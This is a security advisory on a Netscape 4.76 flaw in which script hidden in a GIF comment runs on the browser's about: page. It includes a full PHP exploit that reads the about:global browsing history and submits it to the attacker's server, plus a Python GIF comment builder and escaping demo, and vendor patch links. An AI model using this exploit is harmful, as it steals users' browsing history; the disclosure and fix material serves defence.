COMMAND
Netscape
SYSTEMS AFFECTED
Netscape prior to 4.77
PROBLEM
Florian Wesch found the following. The Netscape browser does not
escape the GIF file comment on the image information page
(about:<url>). This allows JavaScript execution in the "about:"
protocol and can, for example, be used to upload the browsing
history (about:global) to a web server.
Netscape does not allow JavaScript to access documents from a
different domain. This stops a script from one domain from
tampering with login forms or private data of another domain.
The following error message is shown:
"access disallowed from scripts at <javascriptdomain> to documents at another domain."
There is also the "about:" protocol, which is used for some special
tasks:
about: - shows Netscape version and copyrights
about:blank - shows a blank document
about:config - shows Browser configuration.
about:global - shows Information about the Netscape global history
about:<url> - shows Information about the specified url
..
There are some other about: documents (try grepping the netscape
binary).
about:global is very interesting since all visited documents are
listed there, so Florian tried to find a way to access this
information.
Florian created a frameset with two frames. The first frame (called
foo) should contain about:global. Loading that URL with
<frame src="about:global">,
<meta http-equiv="refresh" content="10; URL=about:global"> or
document.location.href="about:global"; did not work. So Florian
used the following trick to make it work:
<base href="about:">
<form action="global" name="loadhistory">
<input type="submit">
</form>
<script language="javascript">
document.loadhistory.submit();
</script>
The intention is that the second frame (called bar) grabs 10 URLs
from the first frame using JavaScript and sends them to the server.
Accessing parent.frames["foo"].document.links does not work, since
foo displays an about: document while bar is a normal http
document: "access disallowed from scripts at blah to documents.."
So he tried to find a way to run JavaScript inside an about:
document. about:<someurl> comes to mind, since that page displays
a lot of server-specified values.
First he tried to inject JavaScript through the URL of the script.
But since this URL is shown encoded (space => %20 etc.), there is
no way in. Modifying the Content-Type (file MIME type) did not work
either, because Netscape opens a "Save as..." dialog when an
unknown MIME type is supplied.
Netscape also shows the comment included in GIF files. A quick test
showed that the comment is not escaped. So JavaScript in a GIF
comment is executed in the about: realm, which means the script
can access the content of about:global. Nice.
The following script, included in the comment, reads 10 URLs from
the about:global frame (foo), stores them in the form and finally
submits this form.
<form action=http://bla/ns476history.php target=_parent name=s method=get>
<input name=u>
</form>
<script>
f=parent.frames["foo"].document;
l="";
for(i=0;i<10;i++)
l+=f.links[i]+"|";
document.s.u.value=l;
document.s.submit();
</script>
The server now has 10 URLs from about:global. Accessing
about:config should be possible too, but this was not tried.
Exploit:
<?
/*
Netscape 4.76 gif comment flaw
Florian Wesch <fw@dividuum.de>
http://dividuum.de

Written for PHP 4 with register_globals on ($SERVER_NAME, $SERVER_PORT,
$PHP_SELF and the request parameters $mode and $u arrive as plain
globals) and short_open_tag enabled.
*/
$self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF;
// "<form action=".$self is padded to 77 bytes in the gif comment below,
// so $self may be at most 64 bytes.
if (strlen($self)>64) {
echo "Url of $self is too long. 64 maximum.<br>";
echo "You can change this but I think 64 should be enough for anybody ;-)";
exit;
}
if (!isset($mode)) $mode="intro";
// If urllist is submitted
if (isset($u)) $mode="showhist";
switch ($mode) {
case "intro":
?>
<html>
<body>
<a href="<? echo $self; ?>?mode=frameset">Submit 10 urls of your history</a><br>
</body>
</html>
<?
break;
case "frameset":
?>
<html>
<frameset rows="50%,50%" border=0 frameborder=0 framespacing=0>
<frame src="<? echo $self; ?>?mode=loadhistory" name="foo" scrolling=no>
<frame src="<? echo $self; ?>?mode=showimageinfo" name="bar" scrolling=no>
</frameset>
</html>
<?
break;
case "loadhistory":
// replaces the current document with about:global using javascript
?>
<html>
<base href="about:">
<form action="global" name="loadhistory">
<input type="submit">
</form>
<script language="javascript">
document.loadhistory.submit();
</script>
</html>
<?
break;
case "showimageinfo":
?>
<html>
<head>
<meta http-equiv="refresh" content="5; URL=about:<? echo $self; ?>?mode=evilgif">
</head>
<body>
Waiting 5 seconds...<br>
<img src="<? echo $self; ?>?mode=evilgif">
</body>
</html>
<?
break;
case "evilgif":
// Gifs are supposed to be compressed. The program I
// used sucks :-)
header("Content-type: image/gif");
// GIF89a header: 10x10 logical screen, 256-entry global colour table follows
$gif ="4749463839610a000a00f70000ffffffffffccffff";
$gif.="99ffff66ffff33ffff00ffccffffccccffcc99ffcc6";
$gif.="6ffcc33ffcc00ff99ffff99ccff9999ff9966ff9933";
$gif.="ff9900ff66ffff66ccff6699ff6666ff6633ff6600f";
$gif.="f33ffff33ccff3399ff3366ff3333ff3300ff00ffff";
$gif.="00ccff0099ff0066ff0033ff0000fffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="ffffffffffffffffffffffff0000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="00000000000000021feff";
// 21 fe = Comment Extension, ff = length byte of its first (255-byte) sub-block.
// The comment text is padded so that "<form action=".$self is always 77 bytes.
$gif.=bin2hex(sprintf("%77s%s",
/*"<form action=".$self,' target=_parent name=s method=get >'.*/
/* I'm using POST so the submitted urls do not appear in the logfile */
"<form action=".$self,' target=_parent name=s method=post>'.
'<input name=u>'.
'</form>'.
'<script>'.
'f=parent.frames["foo"].document;'.
'l="";'.
/*'for(i=0;i<f.links.length;i++)'.*/
'for(i=0;i<10 ;i++)'.
'l+=f.links[i]+"|";'.
'document.s.u.value=l;'.
'document.'.chr(255).'s.submit();'. // chr(255): length byte of the next comment sub-block
'</script>'));
// zero padding, then 2c = Image Descriptor, LZW pixel data, 3b = trailer
$gif.="00000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="00000000000002c000000000a000a00000813004708";
$gif.="1c48b0a0c18308132a5cc8b061c28000003b";
echo pack("H".strlen($gif), $gif);
break;
case "showhist":
$urls=explode("|",$u);
echo "<h1>Top 10 urls in about:global</h1>";
foreach ($urls as $url) {
$url=htmlspecialchars($url); // do not repeat the unescaped-output bug on the collector page
echo "<a href=\"$url\">$url</a><br>";
}
};
?>
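The GIF comment injection described above, and the hand-assembled hex GIF in the "evilgif" case of the exploit, as an added example that is not Florian Wesch's code and not Netscape's decoder: it builds a valid 1x1 GIF89a carrying an arbitrary comment, splitting the data into the length-prefixed sub-blocks of at most 255 bytes that the GIF format requires (which the exploit does by hand with the 0xff and chr(255) bytes), walks the block structure of a GIF to pull the comment back out so an upload handler or proxy can inspect image metadata, and shows the unescaped rendering that is the bug next to the escaped one that fixes it. The function names, the 1x1 image layout and the sample payload are constructed for this example; the two rendering helpers only model the page-side bug and do not reproduce Netscape's image information page.

```python
"""Added example, not part of the original advisory: GIF comment writer,
block walker and an escaped-vs-unescaped rendering of the comment."""
import html
import struct


def gif_sub_blocks(data: bytes) -> bytes:
    """Encode data as GIF data sub-blocks: a length byte (1..255) before each
    chunk, then a 0x00 block terminator."""
    out = bytearray()
    for i in range(0, len(data), 255):
        chunk = data[i:i + 255]
        out.append(len(chunk))
        out += chunk
    out.append(0)
    return bytes(out)


def build_gif_with_comment(comment: bytes) -> bytes:
    """A valid 1x1 GIF89a whose Comment Extension (0x21 0xFE) carries `comment`."""
    # Header + Logical Screen Descriptor: 1x1, global colour table present
    # (flag bit 7) with 2 entries, background index 0, aspect ratio 0.
    header = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
    gct = b"\x00\x00\x00\xff\xff\xff"                  # black, white
    comment_ext = b"\x21\xfe" + gif_sub_blocks(comment)
    # Image Descriptor: 1x1 image at (0,0), no local colour table.
    image_desc = b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
    # LZW minimum code size 2, then one 2-byte sub-block holding the codes
    # clear(4), pixel 0, end-of-information(5) packed 3 bits each, LSB first.
    image_data = b"\x02" + b"\x02\x44\x01" + b"\x00"
    return header + gct + comment_ext + image_desc + image_data + b"\x3b"


def _read_sub_blocks(buf: bytes, pos: int):
    """Return (data, position after the 0x00 terminator) for a sub-block chain."""
    out = bytearray()
    while True:
        if pos >= len(buf):
            raise ValueError("truncated sub-block chain")
        n = buf[pos]
        pos += 1
        if n == 0:
            return bytes(out), pos
        chunk = buf[pos:pos + n]
        if len(chunk) != n:
            raise ValueError("truncated sub-block")
        out += chunk
        pos += n


def _colour_table_bytes(flags: int) -> int:
    """Size of a colour table announced by a screen/image descriptor flag byte."""
    return 3 * (2 ** ((flags & 0x07) + 1)) if flags & 0x80 else 0


def extract_gif_comments(buf: bytes) -> list:
    """Walk the block structure and return the data of every Comment Extension."""
    if buf[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    _w, _h, flags, _bg, _aspect = struct.unpack("<HHBBB", buf[6:13])
    pos = 13 + _colour_table_bytes(flags)
    comments = []
    while pos < len(buf):
        introducer = buf[pos]
        pos += 1
        if introducer == 0x3b:                         # trailer
            break
        if introducer == 0x00:                         # stray zero padding between
            continue                                   # blocks, as in the exploit GIF
        if introducer == 0x21:                         # extension: label + sub-blocks
            label = buf[pos]
            data, pos = _read_sub_blocks(buf, pos + 1)
            if label == 0xfe:
                comments.append(data)
        elif introducer == 0x2c:                       # image descriptor
            _l, _t, _iw, _ih, iflags = struct.unpack("<HHHHB", buf[pos:pos + 9])
            pos += 9 + _colour_table_bytes(iflags) + 1  # +1: LZW minimum code size
            _pixels, pos = _read_sub_blocks(buf, pos)
        else:
            raise ValueError("unexpected block introducer 0x%02x" % introducer)
    return comments


def image_info_unescaped(comment: bytes) -> str:
    """Comment inserted into an info page as-is: the bug described above."""
    return "<b>Comment:</b> " + comment.decode("latin-1")


def image_info_escaped(comment: bytes) -> str:
    """The fix: HTML-escape untrusted metadata before rendering it."""
    return "<b>Comment:</b> " + html.escape(comment.decode("latin-1"))


def comment_looks_like_markup(comment: bytes) -> bool:
    """Cheap upload-time check: image metadata should never carry tag delimiters."""
    return b"<" in comment or b">" in comment


if __name__ == "__main__":
    payload = b"<script>alert(document.location)</script>"   # constructed sample
    gif = build_gif_with_comment(payload)
    for c in extract_gif_comments(gif):
        print("comment:", c, "markup:", comment_looks_like_markup(c))
        print(image_info_unescaped(c))
        print(image_info_escaped(c))
```

Run it as a script to see the two renderings side by side; point extract_gif_comments at any GIF (including one produced by the exploit above) to list what an image information page would display. The walker reads sub-block chains by their length bytes, so a comment of any size round-trips, and it skips stray zero bytes between blocks the way lenient decoders do, which is what the zero-padded exploit GIF relies on.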
SOLUTION
Disable JavaScript or upgrade to Netscape 4.77.
For RedHat:
ftp://updates.redhat.com/6.2/en/os/SRPMS/netscape-4.77-0.6.2.src.rpm
ftp://updates.redhat.com/6.2/en/os/SRPMS/netscape-alpha-4.77-0.6.2.src.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/netscape-common-4.77-0.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/netscape-communicator-4.77-0.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/netscape-navigator-4.77-0.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/i386/netscape-common-4.77-0.6.2.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/netscape-communicator-4.77-0.6.2.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/netscape-navigator-4.77-0.6.2.i386.rpm
ftp://updates.redhat.com/7.0/en/os/SRPMS/netscape-4.77-1.src.rpm
ftp://updates.redhat.com/7.0/en/os/SRPMS/netscape-alpha-4.77-1.src.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/netscape-common-4.77-1.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/netscape-communicator-4.77-1.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/netscape-navigator-4.77-1.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/i386/netscape-common-4.77-1.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/netscape-communicator-4.77-1.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/netscape-navigator-4.77-1.i386.rpm
For Immunix OS:
http://immunix.org/ImmunixOS/6.2/updates/RPMS/netscape-common-4.77-0.6.2_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/RPMS/netscape-communicator-4.77-0.6.2_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/RPMS/netscape-navigator-4.77-0.6.2_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/SRPMS/netscape-4.77-0.6.2_StackGuard.src.rpm
http://immunix.org/ImmunixOS/7.0/updates/RPMS/netscape-common-4.77-1_imnx.i386.rpm
http://immunix.org/ImmunixOS/7.0/updates/RPMS/netscape-communicator-4.77-1_imnx.i386.rpm
http://immunix.org/ImmunixOS/7.0/updates/RPMS/netscape-navigator-4.77-1_imnx.i386.rpm
http://immunix.org/ImmunixOS/7.0/updates/SRPMS/netscape-4.77-1_imnx.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/netscape-navigator-4.77-1cl.i386.rpm
For Progeny Linux:
1. Ensure that your /etc/apt/sources.list file has a URI for
Progeny's update repository:
deb http://archive.progeny.com/progeny updates/newton/
2. Update your cache of available packages for apt(8).
# apt-get update
3. If you are currently running the Netscape browser, please
exit the application.
4. Using apt(8), install the new package. apt(8) will
download the update, verify its integrity with md5, and
then install the package on your system with dpkg(8).
# apt-get install netscape
For Debian Linux:
http://security.debian.org/dists/stable/updates/contrib/source/netscape4.base_4.77-1.tar.gz
http://security.debian.org/dists/stable/updates/contrib/source/netscape4.base_4.77-1.dsc
http://security.debian.org/dists/stable/updates/main/source/netscape4.77_4.77-2.dsc
http://security.debian.org/dists/stable/updates/main/source/netscape4.77_4.77-2.diff.gz
http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-ja-resource-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-java-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-ko-resource-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-zh-resource-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/non-free/binary-all/navigator-nethelp-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/non-free/binary-all/communicator-nethelp-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/non-free/binary-all/communicator-spellchk-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/contrib/binary-i386/netscape_4.77-1_i386.deb
http://security.debian.org/dists/stable/updates/contrib/binary-i386/netscape-base-4-libc5_4.77-1_i386.deb
http://security.debian.org/dists/stable/updates/contrib/binary-i386/netscape-base-4_4.77-1_i386.deb
http://security.debian.org/dists/stable/updates/contrib/binary-i386/navigator_4.77-1_i386.deb
http://security.debian.org/dists/stable/updates/contrib/binary-i386/communicator_4.77-1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/netscape-base-477_4.77-2_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/netscape-smotif-477_4.77-2_i386.deb
http://security.debian.org/dists/stable/updates/non-free/binary-i386/netscape-base-477_4.77-2_i386.deb
http://security.debian.org/dists/stable/updates/non-free/binary-i386/navigator-base-477_4.77-2_i386.deb
http://security.debian.org/dists/stable/updates/non-free/binary-i386/navigator-smotif-477_4.77-2_i386.deb
http://security.debian.org/dists/stable/updates/non-free/binary-i386/communicator-base-477_4.77-2_i386.deb
http://security.debian.org/dists/stable/updates/non-free/binary-i386/communicator-smotif-477_4.77-2_i386.deb
For Turbo Linux:
ftp://ftp.turbolinux.com/pub/updates/6.0/security/netscape-communicator-4.77-3.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/netscape-communicator-4.77-3.src.rpm